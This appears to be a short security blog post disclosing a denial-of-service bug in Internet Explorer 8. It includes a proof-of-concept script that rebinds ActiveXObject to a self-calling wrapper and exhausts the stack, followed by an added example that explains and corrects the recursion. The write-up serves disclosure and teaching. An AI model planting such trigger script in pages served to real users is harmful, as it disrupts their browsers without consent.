MSIE 8 Out Of Stack Space.

Published on: 1211223437
First time I saw such an error message in a browser.



It's not the same as an out-of-memory problem, but an out-of-stack-space problem. I wrote about a similar attack on MSIE 8 in March, that resulted in a persistent denial of service. This vulnerability here basically does the same but doesn't crash MSIE. There might be a better term for it of which I am not aware, but I like to call it function aliasing since that suits it the best. Interestingly, it not only works on the new XDR object found in March, but also on a regular XMLHttpRequest function inside MSIE 8. I think more is possible with this kind of attack. I might do a stack trace when I have the time, but for now here is a small sample that triggers an out-of-stack-space message in under a second, which is the fastest I have ever seen:



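<script>
// Alias the real constructor. This reference is never called and is
// overwritten further down.
xmlhttp = ActiveXObject;

// Rebind the global name to a wrapper. Inside the wrapper, "ActiveXObject"
// now resolves to the wrapper itself, so every call recurses.
ActiveXObject = function() {
    return new ActiveXObject("MSXML2.XMLHTTP");
}

ping = 'hello';
// This construction enters the recursive wrapper above.
xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "#", false);
xmlhttp.send(ping);
</script>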
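The recursion in the sample comes from the wrapper looking up the rebound name instead of the saved alias. The following is an added example, not code from the original post: it reproduces that lookup with a stand-in constructor (`Transport`, `makeEnv` and the other function names are hypothetical) and shows the wrapper that calls the saved original instead. It assumes a current JavaScript engine such as Node.js, which reports the stack exhaustion as a catchable `RangeError`.

```javascript
// Stand-in for a host constructor; constructed for this example.
function makeEnv() {
  const env = {};
  env.Transport = function (progId) { this.progId = progId; };
  return env;
}

// Same shape as the sample: the original is saved, but the wrapper resolves
// the name again at call time and therefore finds itself.
function wrapSelfReferencing(env) {
  const original = env.Transport; // saved but never used, as in the sample
  env.Transport = function () {
    return new env.Transport("MSXML2.XMLHTTP");
  };
  return original;
}

// Corrected wrapper: the closure holds the original constructor, so the
// rebound name is never looked up from inside the wrapper.
function wrapViaSavedOriginal(env) {
  const original = env.Transport;
  env.Transport = function (progId) {
    return new original(progId);
  };
}

// Construct through whatever env.Transport currently is and report the result.
function tryConstruct(env) {
  try {
    const obj = new env.Transport("MSXML2.XMLHTTP");
    return { ok: true, progId: obj.progId };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

const broken = makeEnv();
wrapSelfReferencing(broken);
console.log(tryConstruct(broken));

const fixed = makeEnv();
wrapViaSavedOriginal(fixed);
console.log(tryConstruct(fixed));
```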